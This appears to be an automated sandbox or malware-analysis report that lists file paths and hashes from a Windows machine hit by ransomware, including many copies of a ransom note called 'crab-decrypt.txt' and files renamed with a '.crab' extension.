SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\skype\roottools\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\contacts\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\desktop\6whijpj4xfj dhxr\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\documents\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\music\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\pictures\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\documents\my shapes\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\documents\my shapes\_private\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\videos\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\documents\onenote notebooks\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\documents\onenote notebooks\my notebook\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\documents\outlook files\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\documents\sgurwmva- rlprkv9\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\documents\sgurwmva- rlprkv9\d9hxfrar\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\documents\sgurwmva- rlprkv9\d9hxfrar\hwprwg1\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\documents\ssmnypkw7ql8djzpix\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\documents\uq1nb2xmh5i6grwxauje\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\downloads\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\favorites\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\favorites\links\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\favorites\microsoft websites\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\favorites\msn websites\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\favorites\windows live\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\links\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\music\6ndqeo2wtiyr9arwuhly\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\music\6ndqeo2wtiyr9arwuhly\iirv\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\music\6ndqeo2wtiyr9arwuhly\jejx_ams\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\music\6ndqeo2wtiyr9arwuhly\moyq6qdeef\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\music\a8bu5\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\music\a8bu5\i3qxwtjyd4gqwsupi-\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\music\amgstb1ioxb\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\music\jp7u4fxs0psx3it\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\music\qhybu-qz9t\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\music\qhybu-qz9t\yyzcup8\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\windows\network shortcuts\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\onedrive\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\pictures\sl4hxh\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\pictures\sl4hxh\fc_q2g_1tjiw\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\pictures\u8 t2ynifi5_m4\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\pictures\u8 t2ynifi5_m4\eo4g\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\windows\printer shortcuts\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\windows\recent\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\saved games\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\searches\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\windows\sendto\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\windows\start menu\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\appdata\roaming\microsoft\windows\templates\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\users\aetadzjz\videos\6nvllwudrazuhx\crab-decrypt.txt 3.20 KB MD5: 6b44484db046284ce0b4caa99e56d71b
SHA1: 2e0acd671535782ca139098a6234086071d57648
SHA256: 773ca23e6a02ca92ed3ee54b293d6df3125696bfa0ebaa0e0b74f8fef552d33d 		False
...
c:\recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\boot.sdi.crab 3.02 MB MD5: 8629c225a5c976a65367b36ac8b0127a
SHA1: 55047f6b79e87bde4d1944fdc2bb0d69176088d6
SHA256: 721bb60dae5eb40c0855a928c0a10678939966af9093c5c731cfae6bf13683e4 		False
...
c:\recovery\121b3f02-5db6-11e7-a78f-e0ac95e38a5b\winre.wim.crab 10.00 MB MD5: b485b64dd05ef2f64c93d6fd0819dd5a
SHA1: 08ae818c89fc1ff85ac67b00a85b49392ad2a471
SHA256: 576a295a621fc404634112b2911598f32a11bb0eaa891a54252573133d29612e 		False
...
c:\system volume information\spp\onlinemetadatacache\{1464a7e2-b1f6-44f6-ab25-0a7a4bb4c5ec}_ondisksnapshotprop.crab 2.84 KB MD5: f506c2f9e5b7bc465e9d9014a221370b
SHA1: 796f56de9c015d5d42c397608babdbf1143e6471
SHA256: 91db0d6cbb22a58c87462acd4e6424ef8911cf3be803a25b079920d88d609f35 		False
...
c:\system volume information\spp\onlinemetadatacache\{17603fef-a99c-46eb-a49a-b5f7a388ac37}_ondisksnapshotprop.crab 4.04 KB MD5: 473766051824194bf35ccc66691a767c
SHA1: 0a1d0ba9e54ade847c1ea6e01361236e4a1ca1c7
SHA256: b4702dd83674ef802f4407eaa0e3c4d5e897bc64a143eb323dd68088fff6e864 		False
...
c:\system volume information\spp\onlinemetadatacache\{1d99f231-08df-4547-9987-3ce24f9e555d}_ondisksnapshotprop.crab 1.57 KB MD5: 5407a56948684e9c3257698ead3c9976
SHA1: 07a77fa0bcd8165ee91d437c88bf652778cc23f9
SHA256: 7f8293a21529fb344b0d27e2f1153e65f3390b175ae1dd4fd45e93f08f65cbfd 		False
...
c:\system volume information\spp\onlinemetadatacache\{24501ced-d134-42f7-8d5e-7175ee970ba1}_ondisksnapshotprop.crab 1.45 KB MD5: 1e3b2f69dc32bdd86d6ed9dc40dcdf41
SHA1: 2218f74c87aee75971880fd1d3776f16b847243b
SHA256: ea16ade76828e9dc538299d9812001902ea61b553c3ab99801ba784500db9ecb 		False
...
c:\system volume information\spp\onlinemetadatacache\{35181908-2f4d-4f92-b01d-72ac6330cc78}_ondisksnapshotprop.crab 2.68 KB MD5: 8ac228346c1f4aa5f5fc40cb03bef964
SHA1: 32dd1f56035358d5c71d024d9870648278ca3a08
SHA256: 104adde4c8e6c9c068e1b1c6648374b5580f1b753bb9df11dd4b5146ea5e3f09 		False
...
c:\system volume information\spp\onlinemetadatacache\{3dfb3fc9-afa8-469c-8a44-3e1ae00a9f90}_ondisksnapshotprop.crab 4.05 KB MD5: a94edd2e2301be11123febc8386d3273
SHA1: d4d1141e3b965b19d56e74c84b794a3e74ed55d1
SHA256: ca0263452041729a154914953f308e98c0da32efd84310b7a9c0816479b70a35 		False
...
c:\system volume information\spp\onlinemetadatacache\{6de242b9-6bd1-4a34-9c7e-ae773241e8a6}_ondisksnapshotprop.crab 2.35 KB MD5: b4656351a59ad09b696b7236b8eaea90
SHA1: b477e262ae65494ba29d05c39661e0716c7a0cae
SHA256: aca14b1be5a199868e462166a9ce27a0da6c2209057733dfdbebf34ccea09274 		False
...
c:\system volume information\spp\onlinemetadatacache\{769c2e8d-f2e6-4a7c-af31-78473f5ca2c8}_ondisksnapshotprop.crab 2.68 KB MD5: 4813b7c51409cefe3c52972987df6279
SHA1: 84b2a87948c87cbaf752899c4bf2b1384067da75
SHA256: 7b3bcdeb3d4e860e24dfb2c249f929fbe9cecc4b21f5b8b1c9bb220f77454b8e 		False
...
c:\system volume information\spp\onlinemetadatacache\{94bf45cf-4822-43cb-a9fe-831f0233e98b}_ondisksnapshotprop.crab 3.88 KB MD5: bebc65e35b32aceb31adfddcc1ebc07d
SHA1: 57bfa5154845c56a6cf252c0f852ef5deaa0fb06
SHA256: 2cb390d0ca0632301ec1fda04e8553b79ce07f5fe00f904b9ec73c8f927e7b76 		False
...
c:\system volume information\spp\onlinemetadatacache\{9d0bf28b-8dfa-449c-ae09-69210091e6b1}_ondisksnapshotprop.crab 2.68 KB MD5: 0b62d42fbc2c067778fdc46b21695257
SHA1: 2646bde2305a61c2e24b5452d362746137d42b87
SHA256: e0d12874b4ababdcc885fdc23891ef5e27a8bc9373a005350d872ac0ef42f990 		False
...
c:\system volume information\spp\onlinemetadatacache\{9f994170-a62e-460e-95f4-d454e609b902}_ondisksnapshotprop.crab 2.51 KB MD5: 10e94a0f44bd08e4b0c7ae64b376d2ce
SHA1: f1df284110aeb7e4b2af6bfabbba519c38ad4159
SHA256: 2a63450097c83b29bdb1a8da30961803deb0529fb8fedf8f805caab0b6a183a8 		False
...
c:\system volume information\spp\onlinemetadatacache\{a39dd420-af4f-496a-b0d7-d3cc4fdd5e55}_ondisksnapshotprop.crab 3.23 KB MD5: a26e22975ad732b8e494768137b97dbd
SHA1: 3c5d2991d338c0ebea567fee5274f72a3d3ac3ac
SHA256: c9b3409341688aceef03de6c31e54149b293beb0c263bee7c703c2dca4592e8b 		False
...
c:\system volume information\spp\onlinemetadatacache\{b1cfdd1f-2e6a-4855-9e5a-5ed651bc00a6}_ondisksnapshotprop.crab 3.15 KB MD5: 0f7ee49096f8a989dc39f98347a02495
SHA1: 11b915682c7887d4819627f3172c64b0ff5ae741
SHA256: 60f413bb382f392b3157f8b12dcd7959f27640ac1afed5b3d53351d99bd6e8d4 		False
...
c:\system volume information\spp\onlinemetadatacache\{b93ef032-f284-4373-867a-0a7c411a3533}_ondisksnapshotprop.crab 3.65 KB MD5: 2c02b714179ed7a00192bc38ae6fcb4c
SHA1: b10db43184e239fc7e75e7476ee7b17d64607030
SHA256: 16f11f7002f6cb2b8425eecf0e2ca023d670fcfb6fb170a949810332acbc4bdb 		False
...
c:\system volume information\spp\onlinemetadatacache\{c684e574-aa8a-4967-87af-835ad01dac1f}_ondisksnapshotprop.crab 2.99 KB MD5: 193adc77c36b301afe51b4b405ae2b99
SHA1: 9faec0c5c9259b6b2b03f6e8be6c6851206cbf10
SHA256: f177715b469350aaaf291e984bd754364ab95a87b63ddfca5aeefa6f46f1b0e3 		False
...
c:\system volume information\spp\onlinemetadatacache\{d887cb21-a8aa-4c57-9af2-0e685e00ce52}_ondisksnapshotprop.crab 3.35 KB MD5: b31d67dceb4a0bfc1a537172e06e9c62
SHA1: e04a55ddb800acf579f03b2d95205fa19d6d6b77
SHA256: 2956bbc70e4c150dd78ad1d86e6ead7be82ce54c3dececb89670fa8859f69b76 		False
...
c:\system volume information\spp\onlinemetadatacache\{e3ca7794-2c72-4a5f-8fcf-2d8eb6350cf6}_ondisksnapshotprop.crab 3.88 KB MD5: f49a7f3bb1369e0ded9af73d0bb06630
SHA1: 4d88f9c2964fa9af5f191b281dcbd520d131a87b
SHA256: 17aa08177e95cc10781972988a2979cc81c3d7509ed6dd167da905eb778fbb99 		False
...
c:\system volume information\spp\onlinemetadatacache\{f00aef54-2b29-4f30-9429-c13ae938f270}_ondisksnapshotprop.crab 2.84 KB MD5: 58727f2df0204926cb682bb3aaf9356c
SHA1: 2b02094a5720f9ac5d92bb41d8349f5b34403af6
SHA256: 23a3851139a28f14cdc182b1857891e6ed61a418585995b60f29dc0c20f16e3d 		False
...
c:\system volume information\spp\onlinemetadatacache\{f1963fd0-0ba1-4118-bf3d-f2391ae2db09}_ondisksnapshotprop.crab 2.68 KB MD5: 51d45e10f00e9f051e7201b27efe38d4
SHA1: 88c27017a0c1e5e169024670a47e73ebc9c57624
SHA256: b426e4836711442148aab72accff60c70419aee200146ce7c82ef0ab25116127 		False
...
c:\system volume information\spp\onlinemetadatacache\{f4fdf7fd-1b30-4a2c-8e9a-65221a85d66c}_ondisksnapshotprop.crab 1.37 KB MD5: e66ac051790dbdd756bcd1b43fa08bf6
SHA1: d44edf61a4105f4492571781a6d5ad9758b10ca4
SHA256: b8bed46e0eb0f8954d41d3abbf8a0b77f9fa7fe810860e41d5aaff7a509daa6d 		False
...
c:\system volume information\syscache.hve.crab 256.51 KB MD5: a0ee219d71716f9796d977f8d3a275a9
SHA1: e357004e8d3249830e65eaa72f61cc3bcef40bc1
SHA256: 35771ee815a6826a7594acd8d82e1587221b4372042c6a7cee1261dee59fae70 		False
...
c:\system volume information\syscache.hve.log1.crab 41.51 KB MD5: 1b52f9b23f60ee622e036f858f09286f
SHA1: 6b48b17cc3ccd7ab7dc9ce8b4a7cead403936078
SHA256: f78b72adac7adffd5bac635a12dc9568b6b9b729a5108a17ce2bfbeed1ef097b 		False
...
c:\system volume information\tracking.log.crab 20.51 KB MD5: abf4c10c411322655f9843a1c5c6973c
SHA1: e1711a11bfb36557dcf6289fcbf8f3f1339a0b1f
SHA256: abea4f8132c9e451c14a71c2c0fae0ea32d4a0f0e10836907dd492c50f0ce10b 		False
...
c:\users\aetadzjz\appdata\roaming\0ukmtstex9yk.wav.crab 83.60 KB MD5: e6bc1c2cf4012c6b0b8af7e2b3e878f1
SHA1: 5a8c9c8b88f9db8b7e6058bf4215836f9cd9b83b
SHA256: 409f7be4fc916f3609e6b1cca2386f49de3374a6d0a6498e7ee1a7ec906f15a9 		False
...
c:\users\aetadzjz\appdata\roaming\30e0elqhb.swf.crab 8.05 KB MD5: 91bf7e353421c5a06155fcab312273aa
SHA1: dd68687e5584f7daa6248d5017a95d3c1181bd30
SHA256: 75e3c5b1186216e5f328480dc08b9ed0d0dfd3de73cd96a6e8b3ce18ba7c17e9 		False
...
c:\users\aetadzjz\appdata\roaming\6i3xiubh eo_oc.mp3.crab 2.68 KB MD5: 268dbb7ef8cd5fcaef5130e1164b12ba
SHA1: 09122b77f38aa34ba4d9c9152e272e5dec802500
SHA256: 1df77d987c3398a1585c00444875d6b0b5c8030e96829e5ef4c3760c32ccd709 		False
...
c:\users\aetadzjz\appdata\roaming\6lymm.gif.crab 11.79 KB MD5: 2fb3da8bf6747f039ecab5ca8e21f76b
SHA1: 16d3f159abdcd1f2396516c477ad2d3cda455e65
SHA256: a326094c3a327367b04858a0d8f379da3f0fc0238013183f147e72061730d35f 		False
...
c:\users\aetadzjz\appdata\roaming\73aca1hjzj21f.gif.crab 41.85 KB MD5: 0df55135e6507f3e0e627b59dba08b58
SHA1: 2043437698d70720212002c635281a74f21537fe
SHA256: fb6aa8499bca79a80d5617759154e04322bef89b127d5d7d959e7d6da9f24332 		False
...
c:\users\aetadzjz\appdata\roaming\7ltxtvcqhg5aps.wav.crab 22.51 KB MD5: 4d3c7b59ba2c2f9159f5b5cd4ec770ed
SHA1: c69a8744c79919238e74fed2533344376602053a
SHA256: 22a5a9321ec1d0d56d157a81e3215699ddd10fa014cc0fcb94ae3d492c288ac2 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\javascripts\glob.settings.js.crab 0.52 KB MD5: 79af05032b31eb10a9a349061918a3f8
SHA1: 10e6e16e36d579f6a585473e1b15c04001ed9424
SHA256: 70c7ec05ded1349a258cda470fb5179d9d97eb2ddf9cf1fa312e6c6b70e2f3e6 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\security\addressbook.acrodata.crab 5.79 KB MD5: 4a7dd7842903fdcdb960498fdeb67a26
SHA1: 977cd08dd2d83980313d88337fa8f46450f8ee4c
SHA256: be4fcdd46d44fcc7d944053c4dac95c05f9558407dab164adf98630aa3ea965e 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\48b76449f3d5fefa1133aa805e420f0fca643651.crl.crab 1.43 KB MD5: 1ebea4ae922aaeab079a3aaed58923a8
SHA1: 3a1ab99caebc16cc6cea8e1cb02ee17c005e7dc9
SHA256: 8bdd863b3728e65c5e246dfa6da6ee24c3eb65844f020c86d47cb88308f20288 		False
...
c:\users\aetadzjz\appdata\roaming\adobe\acrobat\10.0\security\crlcache\a9b8213768adc68af64fcc6409e8be414726687f.crl.crab 37.34 KB MD5: e92ce942f84eac56964d90091c35c5f4
SHA1: 0b4148a7cff4cd8ecb87df9c38bacf8ac03d30bc
SHA256: 6a348eeaef617c3122493423f82bea5e9ea79d653695b594b583fb437caeba70 		False
...
c:\users\aetadzjz\appdata\roaming\aol-klyxxd-ebhs.pptx.crab 83.90 KB MD5: 39aeedec785bfb65979b53f6db169c6b
SHA1: e66d589fefe5dc7684cd1ee3ac1b0651e2360181
SHA256: f32e4fde2baef85d5f760f1f832607bd0261eb47b360e884e895666fbeefe2b1 		False
...
c:\users\aetadzjz\appdata\roaming\baw5gk592jesnf.ots.crab 53.88 KB MD5: 26d1fb5bfcf53bafa050bc921f9928c9
SHA1: 4172dff7100c81d399a72db6b9e907bca5978d5f
SHA256: e4c5a39c1f7cca14530f7b19332fe356da325c53d845a7bd6309699e3b07aba4 		False
...
c:\users\aetadzjz\appdata\roaming\bqt4ggf.swf.crab 43.88 KB MD5: 3a31df45c458bda012f3c9b76760ec28
SHA1: 911a15c6b302f010e02b36fc735461fcd7012b74
SHA256: cde860bf26e701402457879a35af3e2696edd99c710c591f046a8140f88d9df5 		False
...
c:\users\aetadzjz\appdata\roaming\budlikwwdvlvu0fp.mp4.crab 96.34 KB MD5: c7d613fbc7832e7932037f319a2fa449
SHA1: 5a37af6afcf6733ee815e2a4d3a283cf3d4e9b4a
SHA256: 55a5625b4feccef5ad219faf3f4e881a7b3b61811b1de9fae364f4f7cdef4fad 		False
...
c:\users\aetadzjz\appdata\roaming\exmxnqbdylogw3q.doc.crab 100.29 KB MD5: e7b8bbbd3d69fb73e294110608700c7c
SHA1: 392597d5eb4590668aa8c6aee58a13f7c9f83afc
SHA256: 04283b78d05c931319e68b5d3e1e2d638e70e8e983717346aeaa1b2e30cb511a 		False
...
c:\users\aetadzjz\appdata\roaming\ft3b3gt-ot4iu6mhqp.png.crab 94.55 KB MD5: ea5b3b22286d0b28e6d0b0daf9668b90
SHA1: cbf261f62af6b92098238c96e0411bf8bb9afb01
SHA256: 5ef415c45b698bf5e0b9d66304653ba7e52b02c8771400b6978ffc03d395775c 		False
...
c:\users\aetadzjz\appdata\roaming\gavqdx.flv.crab 22.37 KB MD5: 9bc92913a91abb7272dced15f5fdcb52
SHA1: 074b78ffae45ba2238d53bdc3610be5e70ec8c73
SHA256: a3598d9e87f042537b27f500d2b3a180a1ac53af45865843797f50d1ebb04848 		False
...
c:\users\aetadzjz\appdata\roaming\gxtbd6taqckz 44xyshn.mp3.crab 73.90 KB MD5: 81e92df5a0605d011098abba43884eb1
SHA1: b77e5a4311270422e787d48f3f9101a9d23a03a9
SHA256: 83ee033a1bb017b44f136e0c4273cfc6acc5060a922731eb129136b83ca10b6c 		False
...
